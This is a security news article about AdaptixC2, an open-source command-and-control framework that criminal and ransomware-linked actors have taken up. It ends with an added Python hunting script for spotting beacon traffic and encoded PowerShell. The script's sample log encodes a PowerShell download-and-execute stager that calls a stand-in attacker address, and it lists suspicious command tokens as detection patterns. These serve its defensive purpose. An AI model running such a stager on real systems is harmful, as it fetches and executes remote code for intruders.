AdaptixC2: Open-Source C2 Tool Gains Traction with Ransomware-Linked Actors

Oct 31, 2025 | News





What AdaptixC2 is

AdaptixC2 is an extensible, open-source command-and-control (C2) and post-exploitation framework built for red-team and adversary-emulation work. The server is written in Go, and the GUI client is a C++ Qt application, so operators can run it on multiple platforms. First published in an early form in August 2024, the project is positioned as a professional tool for penetration testers, but the same design choices and public availability make it attractive for misuse.


Features and technical profile

AdaptixC2 offers a broad set of capabilities typical of modern C2 frameworks:

  • Encrypted communications between operators and agents.
  • Command execution and a remote interactive terminal.
  • Credential management and screenshot capture.
  • Extensible module/plugin model enabling additional functionality as needed.

Its modular architecture and cross-platform client make rapid development and deployment feasible for both legitimate red teams and malicious operators.


Abuse and malware ecosystem links

Security firms report growing criminal adoption of AdaptixC2. Several threat actors, including groups tied to the Fog and Akira ransomware operations, have been observed using the framework. An initial access broker has reportedly used CountLoader in delivery chains that end with AdaptixC2 and other post-exploitation tools.

Palo Alto Networks Unit 42 described AdaptixC2 as modular and versatile, noting real-world abuse in social-engineering scams (fake help-desk calls over Microsoft Teams) and attacks that used AI-generated PowerShell scripts to automate post-exploitation tasks.


Developer, community, and risk signals

The first public release was published by the GitHub user RalfHacker (@HackerRalf), who self-identifies as a penetration tester and “MalDev.” Researchers at Silent Push highlighted several risk factors tied to the project’s community footprint:

  • Public GitHub presence and linked email addresses.
  • A Telegram channel with a large following (RalfHackerChannel, reported at roughly 28,000 subscribers) used to share AdaptixC2 updates and related content.
  • Public discussion about building a “public C2” and comparisons to frameworks like Empire.

Those community signals, combined with an observed uptick in AdaptixC2 usage by actors linked to Russian-speaking cybercrime, raised red flags for some researchers, though no public evidence directly ties the developer to criminal activity.


Why open-source C2 tools get weaponized

AdaptixC2’s trajectory mirrors a wider trend: freely available red-team frameworks such as Havoc, Mythic, and Sliver, and historically cracked copies of the commercial Cobalt Strike and Brute Ratel, are routinely repurposed by malicious actors because they:

  • Lower technical barriers to advanced post-exploitation.
  • Provide ready-made, maintained tooling for C2, lateral movement, and persistence.
  • Allow operators to blend legitimate-looking tooling into attack chains.

Public availability plus active communities accelerate feature development, but also speed up criminal adoption and knowledge transfer.




Defensive guidance

Organizations and defenders should treat the rise of AdaptixC2 as part of a broader risk picture and take pragmatic steps:

  • Hunt for C2 indicators: look for outbound TLS connections that recur at fixed intervals or go to rarely seen destinations, unrecognised client binaries, unexpected PowerShell one-liners (especially encoded ones), and behaviour consistent with credential harvesting, remote shells, or screenshot exfiltration.
  • Secure initial access vectors: harden remote access (MFA everywhere), patch exposed RDP, VPN, and collaboration services, and monitor for initial-access-broker activity such as CountLoader.
  • Endpoint controls and EDR: make sure EDR alerts on suspicious command-execution chains, newly created services, and network connections from processes that normally never reach the internet.
  • Telemetry and threat-intel sharing: exchange IOCs and TTPs with trusted sources (ISACs, vendors, CERTs) to detect reuse of public tools in malicious campaigns.
  • Operational countermeasures: apply application allowlisting, network egress controls, and least privilege for the service accounts attackers most often abuse.
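One way to turn the first bullet into something that runs, as an added example that is not from the article or from the AdaptixC2 project: a small Python hunt over constructed egress-proxy and process-creation logs. It flags host/destination pairs whose outbound TLS connections recur at nearly constant intervals (the check-in pattern of an agent on a fixed sleep), and it decodes PowerShell `-EncodedCommand` arguments and flags common download-and-execute tokens. The log formats, hostnames, IP addresses, and thresholds are assumptions made for the demo; the heuristics are generic C2 tradecraft checks, not AdaptixC2 signatures.

```python
"""Constructed-log hunt for beacon-like egress and encoded PowerShell.

Added example; not from the original article or the AdaptixC2 project.
All log data below is constructed for the demo, including the addresses.
"""
import base64
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed egress-proxy records: "timestamp src dst:port bytes".
# 10.0.0.5 reaches out roughly every 60 s; 10.0.0.7 is ordinary browsing.
PROXY_LOG = """\
2025-10-31T10:00:00 10.0.0.5 203.0.113.10:443 612
2025-10-31T10:00:58 10.0.0.5 203.0.113.10:443 598
2025-10-31T10:02:01 10.0.0.5 203.0.113.10:443 604
2025-10-31T10:03:00 10.0.0.5 203.0.113.10:443 611
2025-10-31T10:03:59 10.0.0.5 203.0.113.10:443 590
2025-10-31T10:05:02 10.0.0.5 203.0.113.10:443 607
2025-10-31T10:00:13 10.0.0.7 198.51.100.20:443 48211
2025-10-31T10:17:40 10.0.0.7 198.51.100.20:443 1032
2025-10-31T10:41:05 10.0.0.7 198.51.100.20:443 93310
2025-10-31T11:12:19 10.0.0.7 198.51.100.20:443 2200
2025-10-31T11:20:00 10.0.0.7 198.51.100.20:443 775
2025-10-31T11:58:44 10.0.0.7 198.51.100.20:443 4096
"""


def parse_proxy(text):
    """Group connection timestamps by (source, destination) pair."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, _nbytes = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def beacon_candidates(flows, min_hits=5, max_cv=0.25):
    """Return (src, dst, mean_gap_seconds) for pairs whose inter-connection
    gaps are nearly constant. An agent on a fixed sleep keeps the coefficient
    of variation (stdev / mean) of the gaps small; human traffic does not.
    min_hits and max_cv are assumed thresholds and need tuning per network."""
    out = []
    for (src, dst), times in flows.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            out.append((src, dst, round(mean, 1)))
    return out


def _b64_utf16(script):
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed process-creation records: "host|parent|command line".
# The second line is a typical download-and-execute stager, encoded.
SAMPLE_ENC = _b64_utf16(
    "IEX (New-Object Net.WebClient).DownloadString('https://203.0.113.10/a')")
PROCESS_LOG = f"""\
WS01|explorer.exe|powershell.exe -NoProfile -Command Get-Date
WS01|outlook.exe|powershell.exe -nop -w hidden -enc {SAMPLE_ENC}
SRV02|svchost.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1
"""

# powershell.exe accepts abbreviated parameter names, so match the forms
# commonly seen in the wild rather than only the full -EncodedCommand.
ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|encoded|encodedcommand)\b\s+([A-Za-z0-9+/=]{8,})", re.I)
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
              "FromBase64String", "Invoke-WebRequest")


def decode_encoded_command(cmdline):
    """Return the decoded script for an -EncodedCommand invocation, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_powershell(text):
    """Return (host, parent, decoded_script, matched_tokens) for encoded
    PowerShell whose decoded body contains download/execute tokens."""
    hits = []
    for line in text.splitlines():
        host, parent, cmd = line.split("|", 2)
        decoded = decode_encoded_command(cmd)
        if decoded is None:
            continue
        tokens = [t for t in SUSPICIOUS if t.lower() in decoded.lower()]
        if tokens:
            hits.append((host, parent, decoded, tokens))
    return hits


if __name__ == "__main__":
    for src, dst, period in beacon_candidates(parse_proxy(PROXY_LOG)):
        print(f"beacon-like: {src} -> {dst} every ~{period}s")
    for host, parent, decoded, tokens in suspicious_powershell(PROCESS_LOG):
        print(f"encoded PowerShell on {host} (parent {parent}): {tokens}")
        print(f"  {decoded}")
```

Two caveats before running anything like this against real telemetry. Most modern agents add jitter to their sleep, which raises the coefficient of variation; widen `max_cv`, bucket by hour, or look at the distribution of gaps rather than a single statistic. And plenty of legitimate software (update checkers, monitoring agents, chat clients) beacons on a fixed schedule, so the output is a hunting lead to be joined with destination reputation, process lineage, and the encoded-PowerShell check, not an alert on its own.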


Source: thehackernews.com
